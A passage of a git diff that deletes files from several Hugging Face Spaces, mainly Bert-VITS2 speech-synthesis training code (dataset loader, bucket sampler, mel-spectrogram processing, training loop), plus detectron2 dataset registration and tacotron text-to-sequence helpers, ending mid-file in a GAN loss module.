load_wav_to_torch(filename) - if sampling_rate != self.sampling_rate: - raise ValueError("{} {} SR doesn't match target {} SR".format( - sampling_rate, self.sampling_rate)) - audio_norm = audio / self.max_wav_value - audio_norm = audio_norm.unsqueeze(0) - spec_filename = filename.replace(".wav", ".spec.pt") - if self.use_mel_spec_posterior: - spec_filename = spec_filename.replace(".spec.pt", ".mel.pt") - try: - spec = torch.load(spec_filename) - except: - if self.use_mel_spec_posterior: - spec = mel_spectrogram_torch(audio_norm, self.filter_length, - self.n_mel_channels, self.sampling_rate, self.hop_length, - self.win_length, self.hparams.mel_fmin, self.hparams.mel_fmax, center=False) - else: - spec = spectrogram_torch(audio_norm, self.filter_length, - self.sampling_rate, self.hop_length, self.win_length, - center=False) - spec = torch.squeeze(spec, 0) - torch.save(spec, spec_filename) - return spec, audio_norm - - def get_text(self, text, word2ph, phone, tone, language_str, wav_path): - pold = phone - w2pho = [i for i in word2ph] - word2ph = [i for i in word2ph] - phone, tone, language = cleaned_text_to_sequence(phone, tone, language_str) - pold2 = phone - - if 
self.add_blank: - p1 = len(phone) - phone = commons.intersperse(phone, 0) - p2 = len(phone) - t1 = len(tone) - tone = commons.intersperse(tone, 0) - t2 = len(tone) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - bert_path = wav_path.replace(".wav", ".bert.pt") - try: - bert = torch.load(bert_path) - assert bert.shape[-1] == len(phone) - except: - bert = get_bert(text, word2ph, language_str) - torch.save(bert, bert_path) - #print(bert.shape[-1], bert_path, text, pold) - assert bert.shape[-1] == len(phone) - - assert bert.shape[-1] == len(phone), ( - bert.shape, len(phone), sum(word2ph), p1, p2, t1, t2, pold, pold2, word2ph, text, w2pho) - phone = torch.LongTensor(phone) - tone = torch.LongTensor(tone) - language = torch.LongTensor(language) - return bert, phone, tone, language - - def get_sid(self, sid): - sid = torch.LongTensor([int(sid)]) - return sid - - def __getitem__(self, index): - return self.get_audio_text_speaker_pair(self.audiopaths_sid_text[index]) - - def __len__(self): - return len(self.audiopaths_sid_text) - - -class TextAudioSpeakerCollate(): - """ Zero-pads model inputs and targets - """ - - def __init__(self, return_ids=False): - self.return_ids = return_ids - - def __call__(self, batch): - """Collate's training batch from normalized text, audio and speaker identities - PARAMS - ------ - batch: [text_normalized, spec_normalized, wav_normalized, sid] - """ - # Right zero-pad all one-hot text sequences to max input length - _, ids_sorted_decreasing = torch.sort( - torch.LongTensor([x[1].size(1) for x in batch]), - dim=0, descending=True) - - max_text_len = max([len(x[0]) for x in batch]) - max_spec_len = max([x[1].size(1) for x in batch]) - max_wav_len = max([x[2].size(1) for x in batch]) - - text_lengths = torch.LongTensor(len(batch)) - spec_lengths = torch.LongTensor(len(batch)) - wav_lengths = torch.LongTensor(len(batch)) - sid = torch.LongTensor(len(batch)) - - text_padded = torch.LongTensor(len(batch), max_text_len) - tone_padded = torch.LongTensor(len(batch), max_text_len) - language_padded = torch.LongTensor(len(batch), max_text_len) - bert_padded = torch.FloatTensor(len(batch), 1024, max_text_len) - - spec_padded = torch.FloatTensor(len(batch), batch[0][1].size(0), max_spec_len) - wav_padded = torch.FloatTensor(len(batch), 1, max_wav_len) - text_padded.zero_() - tone_padded.zero_() - language_padded.zero_() - spec_padded.zero_() - wav_padded.zero_() - bert_padded.zero_() - for i in range(len(ids_sorted_decreasing)): - row = batch[ids_sorted_decreasing[i]] - - text = row[0] - text_padded[i, :text.size(0)] = text - text_lengths[i] = text.size(0) - - spec = row[1] - spec_padded[i, :, :spec.size(1)] = spec - spec_lengths[i] = spec.size(1) - - wav = row[2] - wav_padded[i, :, :wav.size(1)] = wav - wav_lengths[i] = wav.size(1) - - sid[i] = row[3] - - tone = row[4] - tone_padded[i, :tone.size(0)] = tone - - language = row[5] - language_padded[i, :language.size(0)] = language - - bert = row[6] - bert_padded[i, :, :bert.size(1)] = bert - - return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, sid, tone_padded, language_padded, bert_padded - - -class DistributedBucketSampler(torch.utils.data.distributed.DistributedSampler): - """ - Maintain similar input lengths in a batch. - Length groups are specified by boundaries. - Ex) boundaries = [b1, b2, b3] -> any batch is included either {x | b1 < length(x) <=b2} or {x | b2 < length(x) <= b3}. 
- - It removes samples which are not included in the boundaries. - Ex) boundaries = [b1, b2, b3] -> any x s.t. length(x) <= b1 or length(x) > b3 are discarded. - """ - - def __init__(self, dataset, batch_size, boundaries, num_replicas=None, rank=None, shuffle=True): - super().__init__(dataset, num_replicas=num_replicas, rank=rank, shuffle=shuffle) - self.lengths = dataset.lengths - self.batch_size = batch_size - self.boundaries = boundaries - - self.buckets, self.num_samples_per_bucket = self._create_buckets() - self.total_size = sum(self.num_samples_per_bucket) - self.num_samples = self.total_size // self.num_replicas - - def _create_buckets(self): - buckets = [[] for _ in range(len(self.boundaries) - 1)] - for i in range(len(self.lengths)): - length = self.lengths[i] - idx_bucket = self._bisect(length) - if idx_bucket != -1: - buckets[idx_bucket].append(i) - - for i in range(len(buckets) - 1, 0, -1): - if len(buckets[i]) == 0: - buckets.pop(i) - self.boundaries.pop(i + 1) - - num_samples_per_bucket = [] - for i in range(len(buckets)): - len_bucket = len(buckets[i]) - total_batch_size = self.num_replicas * self.batch_size - rem = (total_batch_size - (len_bucket % total_batch_size)) % total_batch_size - num_samples_per_bucket.append(len_bucket + rem) - return buckets, num_samples_per_bucket - - def __iter__(self): - # deterministically shuffle based on epoch - g = torch.Generator() - g.manual_seed(self.epoch) - - indices = [] - if self.shuffle: - for bucket in self.buckets: - indices.append(torch.randperm(len(bucket), generator=g).tolist()) - else: - for bucket in self.buckets: - indices.append(list(range(len(bucket)))) - - batches = [] - for i in range(len(self.buckets)): - bucket = self.buckets[i] - len_bucket = len(bucket) - if (len_bucket == 0): - continue - ids_bucket = indices[i] - num_samples_bucket = self.num_samples_per_bucket[i] - - # add extra samples to make it evenly divisible - rem = num_samples_bucket - len_bucket - ids_bucket = ids_bucket + ids_bucket * (rem // len_bucket) + ids_bucket[:(rem % len_bucket)] - - # subsample - ids_bucket = ids_bucket[self.rank::self.num_replicas] - - # batching - for j in range(len(ids_bucket) // self.batch_size): - batch = [bucket[idx] for idx in ids_bucket[j * self.batch_size:(j + 1) * self.batch_size]] - batches.append(batch) - - if self.shuffle: - batch_ids = torch.randperm(len(batches), generator=g).tolist() - batches = [batches[i] for i in batch_ids] - self.batches = batches - - assert len(self.batches) * self.batch_size == self.num_samples - return iter(self.batches) - - def _bisect(self, x, lo=0, hi=None): - if hi is None: - hi = len(self.boundaries) - 1 - - if hi > lo: - mid = (hi + lo) // 2 - if self.boundaries[mid] < x and x <= self.boundaries[mid + 1]: - return mid - elif x <= self.boundaries[mid]: - return self._bisect(x, lo, mid) - else: - return self._bisect(x, mid + 1, hi) - else: - return -1 - - def __len__(self): - return self.num_samples // self.batch_size diff --git a/spaces/XzJosh/Lumi-Bert-VITS2/mel_processing.py b/spaces/XzJosh/Lumi-Bert-VITS2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Lumi-Bert-VITS2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from 
scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/XzJosh/otto-Bert-VITS2/train_ms.py b/spaces/XzJosh/otto-Bert-VITS2/train_ms.py 
deleted file mode 100644 index 5d109003d40497ea4493e7c73f47c1eb7370a81e..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/otto-Bert-VITS2/train_ms.py +++ /dev/null @@ -1,402 +0,0 @@ -import os -import json -import argparse -import itertools -import math -import torch -import shutil -from torch import nn, optim -from torch.nn import functional as F -from torch.utils.data import DataLoader -from torch.utils.tensorboard import SummaryWriter -import torch.multiprocessing as mp -import torch.distributed as dist -from torch.nn.parallel import DistributedDataParallel as DDP -from torch.cuda.amp import autocast, GradScaler -from tqdm import tqdm -import logging -logging.getLogger('numba').setLevel(logging.WARNING) -import commons -import utils -from data_utils import ( - TextAudioSpeakerLoader, - TextAudioSpeakerCollate, - DistributedBucketSampler -) -from models import ( - SynthesizerTrn, - MultiPeriodDiscriminator, - DurationDiscriminator, -) -from losses import ( - generator_loss, - discriminator_loss, - feature_loss, - kl_loss -) -from mel_processing import mel_spectrogram_torch, spec_to_mel_torch -from text.symbols import symbols - -torch.backends.cudnn.benchmark = True -torch.backends.cuda.matmul.allow_tf32 = True -torch.backends.cudnn.allow_tf32 = True -torch.set_float32_matmul_precision('medium') -global_step = 0 - - -def main(): - """Assume Single Node Multi GPUs Training Only""" - assert torch.cuda.is_available(), "CPU training is not allowed." - - n_gpus = torch.cuda.device_count() - os.environ['MASTER_ADDR'] = 'localhost' - os.environ['MASTER_PORT'] = '65280' - - hps = utils.get_hparams() - if not hps.cont: - shutil.copy('./pretrained_models/D_0.pth','./logs/OUTPUT_MODEL/D_0.pth') - shutil.copy('./pretrained_models/G_0.pth','./logs/OUTPUT_MODEL/G_0.pth') - shutil.copy('./pretrained_models/DUR_0.pth','./logs/OUTPUT_MODEL/DUR_0.pth') - mp.spawn(run, nprocs=n_gpus, args=(n_gpus, hps,)) - - -def run(rank, n_gpus, hps): - global global_step - if rank == 0: - logger = utils.get_logger(hps.model_dir) - logger.info(hps) - utils.check_git_hash(hps.model_dir) - writer = SummaryWriter(log_dir=hps.model_dir) - writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, "eval")) - - dist.init_process_group(backend= 'gloo' if os.name == 'nt' else 'nccl', init_method='env://', world_size=n_gpus, rank=rank) - torch.manual_seed(hps.train.seed) - torch.cuda.set_device(rank) - - train_dataset = TextAudioSpeakerLoader(hps.data.training_files, hps.data) - train_sampler = DistributedBucketSampler( - train_dataset, - hps.train.batch_size, - [32, 300, 400, 500, 600, 700, 800, 900, 1000], - num_replicas=n_gpus, - rank=rank, - shuffle=True) - collate_fn = TextAudioSpeakerCollate() - train_loader = DataLoader(train_dataset, num_workers=2, shuffle=False, pin_memory=True, - collate_fn=collate_fn, batch_sampler=train_sampler) - if rank == 0: - eval_dataset = TextAudioSpeakerLoader(hps.data.validation_files, hps.data) - eval_loader = DataLoader(eval_dataset, num_workers=0, shuffle=False, - batch_size=1, pin_memory=True, - drop_last=False, collate_fn=collate_fn) - if "use_noise_scaled_mas" in hps.model.keys() and hps.model.use_noise_scaled_mas == True: - print("Using noise scaled MAS for VITS2") - use_noise_scaled_mas = True - mas_noise_scale_initial = 0.01 - noise_scale_delta = 2e-6 - else: - print("Using normal MAS for VITS1") - use_noise_scaled_mas = False - mas_noise_scale_initial = 0.0 - noise_scale_delta = 0.0 - if "use_duration_discriminator" in hps.model.keys() and 
hps.model.use_duration_discriminator == True: - print("Using duration discriminator for VITS2") - use_duration_discriminator = True - net_dur_disc = DurationDiscriminator( - hps.model.hidden_channels, - hps.model.hidden_channels, - 3, - 0.1, - gin_channels=hps.model.gin_channels if hps.data.n_speakers != 0 else 0, - ).cuda(rank) - if "use_spk_conditioned_encoder" in hps.model.keys() and hps.model.use_spk_conditioned_encoder == True: - if hps.data.n_speakers == 0: - raise ValueError("n_speakers must be > 0 when using spk conditioned encoder to train multi-speaker model") - use_spk_conditioned_encoder = True - else: - print("Using normal encoder for VITS1") - use_spk_conditioned_encoder = False - - net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - n_speakers=hps.data.n_speakers, - mas_noise_scale_initial = mas_noise_scale_initial, - noise_scale_delta = noise_scale_delta, - **hps.model).cuda(rank) - - freeze_enc = getattr(hps.model, "freeze_enc", False) - if freeze_enc: - print("freeze encoder !!!") - for param in net_g.enc_p.parameters(): - param.requires_grad = False - - net_d = MultiPeriodDiscriminator(hps.model.use_spectral_norm).cuda(rank) - optim_g = torch.optim.AdamW( - filter(lambda p: p.requires_grad, net_g.parameters()), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - optim_d = torch.optim.AdamW( - net_d.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - if net_dur_disc is not None: - optim_dur_disc = torch.optim.AdamW( - net_dur_disc.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - else: - optim_dur_disc = None - net_g = DDP(net_g, device_ids=[rank], find_unused_parameters=True) - net_d = DDP(net_d, device_ids=[rank], find_unused_parameters=True) - if net_dur_disc is not None: - net_dur_disc = DDP(net_dur_disc, device_ids=[rank], find_unused_parameters=True) - - pretrain_dir = None - if pretrain_dir is None: - try: - if net_dur_disc is not None: - _, optim_dur_disc, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "DUR_*.pth"), net_dur_disc, optim_dur_disc, skip_optimizer=not hps.cont) - _, optim_g, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "G_*.pth"), net_g, - optim_g, skip_optimizer=not hps.cont) - _, optim_d, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "D_*.pth"), net_d, - optim_d, skip_optimizer=not hps.cont) - - epoch_str = max(epoch_str, 1) - global_step = (epoch_str - 1) * len(train_loader) - except Exception as e: - print(e) - epoch_str = 1 - global_step = 0 - else: - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(pretrain_dir, "G_*.pth"), net_g, - optim_g, True) - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(pretrain_dir, "D_*.pth"), net_d, - optim_d, True) - - - - scheduler_g = torch.optim.lr_scheduler.ExponentialLR(optim_g, gamma=hps.train.lr_decay, last_epoch=epoch_str - 2) - scheduler_d = torch.optim.lr_scheduler.ExponentialLR(optim_d, gamma=hps.train.lr_decay, last_epoch=epoch_str - 2) - if net_dur_disc is not None: - scheduler_dur_disc = torch.optim.lr_scheduler.ExponentialLR(optim_dur_disc, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - else: - scheduler_dur_disc = None - scaler = GradScaler(enabled=hps.train.fp16_run) - - for epoch in range(epoch_str, hps.train.epochs + 1): - if rank == 0: - train_and_evaluate(rank, epoch, 
hps, [net_g, net_d, net_dur_disc], [optim_g, optim_d, optim_dur_disc], [scheduler_g, scheduler_d, scheduler_dur_disc], scaler, [train_loader, eval_loader], logger, [writer, writer_eval]) - else: - train_and_evaluate(rank, epoch, hps, [net_g, net_d, net_dur_disc], [optim_g, optim_d, optim_dur_disc], [scheduler_g, scheduler_d, scheduler_dur_disc], scaler, [train_loader, None], None, None) - scheduler_g.step() - scheduler_d.step() - if net_dur_disc is not None: - scheduler_dur_disc.step() - - -def train_and_evaluate(rank, epoch, hps, nets, optims, schedulers, scaler, loaders, logger, writers): - net_g, net_d, net_dur_disc = nets - optim_g, optim_d, optim_dur_disc = optims - scheduler_g, scheduler_d, scheduler_dur_disc = schedulers - train_loader, eval_loader = loaders - if writers is not None: - writer, writer_eval = writers - - train_loader.batch_sampler.set_epoch(epoch) - global global_step - - net_g.train() - net_d.train() - if net_dur_disc is not None: - net_dur_disc.train() - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers, tone, language, bert) in tqdm(enumerate(train_loader)): - if net_g.module.use_noise_scaled_mas: - current_mas_noise_scale = net_g.module.mas_noise_scale_initial - net_g.module.noise_scale_delta * global_step - net_g.module.current_mas_noise_scale = max(current_mas_noise_scale, 0.0) - x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True) - spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(rank, non_blocking=True) - y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True) - speakers = speakers.cuda(rank, non_blocking=True) - tone = tone.cuda(rank, non_blocking=True) - language = language.cuda(rank, non_blocking=True) - bert = bert.cuda(rank, non_blocking=True) - - with autocast(enabled=hps.train.fp16_run): - y_hat, l_length, attn, ids_slice, x_mask, z_mask, \ - (z, z_p, m_p, logs_p, m_q, logs_q), (hidden_x, logw, logw_) = net_g(x, x_lengths, spec, spec_lengths, speakers, tone, language, bert) - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_mel = commons.slice_segments(mel, ids_slice, hps.train.segment_size // hps.data.hop_length) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - - y = commons.slice_segments(y, ids_slice * hps.data.hop_length, hps.train.segment_size) # slice - - # Discriminator - y_d_hat_r, y_d_hat_g, _, _ = net_d(y, y_hat.detach()) - with autocast(enabled=False): - loss_disc, losses_disc_r, losses_disc_g = discriminator_loss(y_d_hat_r, y_d_hat_g) - loss_disc_all = loss_disc - if net_dur_disc is not None: - y_dur_hat_r, y_dur_hat_g = net_dur_disc(hidden_x.detach(), x_mask.detach(), logw.detach(), logw_.detach()) - with autocast(enabled=False): - # TODO: I think need to mean using the mask, but for now, just mean all - loss_dur_disc, losses_dur_disc_r, losses_dur_disc_g = discriminator_loss(y_dur_hat_r, y_dur_hat_g) - loss_dur_disc_all = loss_dur_disc - optim_dur_disc.zero_grad() - scaler.scale(loss_dur_disc_all).backward() - scaler.unscale_(optim_dur_disc) - grad_norm_dur_disc = commons.clip_grad_value_(net_dur_disc.parameters(), None) - scaler.step(optim_dur_disc) - - optim_d.zero_grad() - scaler.scale(loss_disc_all).backward() - scaler.unscale_(optim_d) 
- grad_norm_d = commons.clip_grad_value_(net_d.parameters(), None) - scaler.step(optim_d) - - with autocast(enabled=hps.train.fp16_run): - # Generator - y_d_hat_r, y_d_hat_g, fmap_r, fmap_g = net_d(y, y_hat) - if net_dur_disc is not None: - y_dur_hat_r, y_dur_hat_g = net_dur_disc(hidden_x, x_mask, logw, logw_) - with autocast(enabled=False): - loss_dur = torch.sum(l_length.float()) - loss_mel = F.l1_loss(y_mel, y_hat_mel) * hps.train.c_mel - loss_kl = kl_loss(z_p, logs_q, m_p, logs_p, z_mask) * hps.train.c_kl - - loss_fm = feature_loss(fmap_r, fmap_g) - loss_gen, losses_gen = generator_loss(y_d_hat_g) - loss_gen_all = loss_gen + loss_fm + loss_mel + loss_dur + loss_kl - if net_dur_disc is not None: - loss_dur_gen, losses_dur_gen = generator_loss(y_dur_hat_g) - loss_gen_all += loss_dur_gen - optim_g.zero_grad() - scaler.scale(loss_gen_all).backward() - scaler.unscale_(optim_g) - grad_norm_g = commons.clip_grad_value_(net_g.parameters(), None) - scaler.step(optim_g) - scaler.update() - - if rank == 0: - if global_step % hps.train.log_interval == 0: - lr = optim_g.param_groups[0]['lr'] - losses = [loss_disc, loss_gen, loss_fm, loss_mel, loss_dur, loss_kl] - logger.info('Train Epoch: {} [{:.0f}%]'.format( - epoch, - 100. * batch_idx / len(train_loader))) - logger.info([x.item() for x in losses] + [global_step, lr]) - - scalar_dict = {"loss/g/total": loss_gen_all, "loss/d/total": loss_disc_all, "learning_rate": lr, - "grad_norm_d": grad_norm_d, "grad_norm_g": grad_norm_g} - scalar_dict.update( - {"loss/g/fm": loss_fm, "loss/g/mel": loss_mel, "loss/g/dur": loss_dur, "loss/g/kl": loss_kl}) - scalar_dict.update({"loss/g/{}".format(i): v for i, v in enumerate(losses_gen)}) - scalar_dict.update({"loss/d_r/{}".format(i): v for i, v in enumerate(losses_disc_r)}) - scalar_dict.update({"loss/d_g/{}".format(i): v for i, v in enumerate(losses_disc_g)}) - - image_dict = { - "slice/mel_org": utils.plot_spectrogram_to_numpy(y_mel[0].data.cpu().numpy()), - "slice/mel_gen": utils.plot_spectrogram_to_numpy(y_hat_mel[0].data.cpu().numpy()), - "all/mel": utils.plot_spectrogram_to_numpy(mel[0].data.cpu().numpy()), - "all/attn": utils.plot_alignment_to_numpy(attn[0, 0].data.cpu().numpy()) - } - utils.summarize( - writer=writer, - global_step=global_step, - images=image_dict, - scalars=scalar_dict) - - if global_step % hps.train.eval_interval == 0: - evaluate(hps, net_g, eval_loader, writer_eval) - utils.save_checkpoint(net_g, optim_g, hps.train.learning_rate, epoch, - os.path.join(hps.model_dir, "G_{}.pth".format(global_step))) - utils.save_checkpoint(net_d, optim_d, hps.train.learning_rate, epoch, - os.path.join(hps.model_dir, "D_{}.pth".format(global_step))) - if net_dur_disc is not None: - utils.save_checkpoint(net_dur_disc, optim_dur_disc, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "DUR_{}.pth".format(global_step))) - keep_ckpts = getattr(hps.train, 'keep_ckpts', 5) - if keep_ckpts > 0: - utils.clean_checkpoints(path_to_models=hps.model_dir, n_ckpts_to_keep=keep_ckpts, sort_by_time=True) - - - global_step += 1 - - if rank == 0: - logger.info('====> Epoch: {}'.format(epoch)) - - - -def evaluate(hps, generator, eval_loader, writer_eval): - generator.eval() - image_dict = {} - audio_dict = {} - print("Evaluating ...") - with torch.no_grad(): - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers, tone, language, bert) in enumerate(eval_loader): - x, x_lengths = x.cuda(), x_lengths.cuda() - spec, spec_lengths = spec.cuda(), spec_lengths.cuda() - y, y_lengths = y.cuda(), 
y_lengths.cuda() - speakers = speakers.cuda() - bert = bert.cuda() - tone = tone.cuda() - language = language.cuda() - for use_sdp in [True, False]: - y_hat, attn, mask, *_ = generator.module.infer(x, x_lengths, speakers, tone, language, bert, y=spec, max_len=1000, sdp_ratio=0.0 if not use_sdp else 1.0) - y_hat_lengths = mask.sum([1, 2]).long() * hps.data.hop_length - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1).float(), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - image_dict.update({ - f"gen/mel_{batch_idx}": utils.plot_spectrogram_to_numpy(y_hat_mel[0].cpu().numpy()) - }) - audio_dict.update({ - f"gen/audio_{batch_idx}_{use_sdp}": y_hat[0, :, :y_hat_lengths[0]] - }) - image_dict.update({f"gt/mel_{batch_idx}": utils.plot_spectrogram_to_numpy(mel[0].cpu().numpy())}) - audio_dict.update({f"gt/audio_{batch_idx}": y[0, :, :y_lengths[0]]}) - - utils.summarize( - writer=writer_eval, - global_step=global_step, - images=image_dict, - audios=audio_dict, - audio_sampling_rate=hps.data.sampling_rate - ) - generator.train() - -if __name__ == "__main__": - main() diff --git a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py b/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py deleted file mode 100644 index a44bedc15e5f0e762fc4d77efd6f1b07c6ff77d0..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -from .coco import load_coco_json, load_sem_seg, register_coco_instances, convert_to_coco_json -from .coco_panoptic import register_coco_panoptic, register_coco_panoptic_separated -from .lvis import load_lvis_json, register_lvis_instances, get_lvis_instances_meta -from .pascal_voc import load_voc_instances, register_pascal_voc -from . import builtin as _builtin # ensure the builtin datasets are registered - - -__all__ = [k for k in globals().keys() if not k.startswith("_")] diff --git a/spaces/YuanMio/vits-uma-genshin-honkai/text/__init__.py b/spaces/YuanMio/vits-uma-genshin-honkai/text/__init__.py deleted file mode 100644 index 663c4b6416affb53c9dc56dddbc8b2b65d4bf518..0000000000000000000000000000000000000000 --- a/spaces/YuanMio/vits-uma-genshin-honkai/text/__init__.py +++ /dev/null @@ -1,57 +0,0 @@ -""" from https://github.com/keithito/tacotron """ -from text import cleaners -from text.symbols import symbols - - -# Mappings from symbol to numeric ID and vice versa: -_symbol_to_id = {s: i for i, s in enumerate(symbols)} -_id_to_symbol = {i: s for i, s in enumerate(symbols)} - - -def text_to_sequence(text, symbols, cleaner_names): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. 
- Args: - text: string to convert to a sequence - cleaner_names: names of the cleaner functions to run the text through - Returns: - List of integers corresponding to the symbols in the text - ''' - _symbol_to_id = {s: i for i, s in enumerate(symbols)} - sequence = [] - - clean_text = _clean_text(text, cleaner_names) - for symbol in clean_text: - if symbol not in _symbol_to_id.keys(): - continue - symbol_id = _symbol_to_id[symbol] - sequence += [symbol_id] - return sequence, clean_text - - -def cleaned_text_to_sequence(cleaned_text): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. - Args: - text: string to convert to a sequence - Returns: - List of integers corresponding to the symbols in the text - ''' - sequence = [_symbol_to_id[symbol] for symbol in cleaned_text if symbol in _symbol_to_id.keys()] - return sequence - - -def sequence_to_text(sequence): - '''Converts a sequence of IDs back to a string''' - result = '' - for symbol_id in sequence: - s = _id_to_symbol[symbol_id] - result += s - return result - - -def _clean_text(text, cleaner_names): - for name in cleaner_names: - cleaner = getattr(cleaners, name) - if not cleaner: - raise Exception('Unknown cleaner: %s' % name) - text = cleaner(text) - return text diff --git a/spaces/Yuliang/ECON/lib/net/GANLoss.py b/spaces/Yuliang/ECON/lib/net/GANLoss.py deleted file mode 100644 index 79c778a403eb249687ac4850cfb2fb84e5e1dcfb..0000000000000000000000000000000000000000 --- a/spaces/Yuliang/ECON/lib/net/GANLoss.py +++ /dev/null @@ -1,74 +0,0 @@ -""" The code is based on https://github.com/apple/ml-gsn/ with adaption. """ - -import torch -import torch.nn as nn -import torch.nn.functional as F -from torch import autograd - -from lib.net.Discriminator import StyleDiscriminator - - -def hinge_loss(fake_pred, real_pred, mode): - if mode == 'd': - # Discriminator update - d_loss_fake = torch.mean(F.relu(1.0 + fake_pred)) - d_loss_real = torch.mean(F.relu(1.0 - real_pred)) - d_loss = d_loss_fake + d_loss_real - elif mode == 'g': - # Generator update - d_loss = -torch.mean(fake_pred) - return 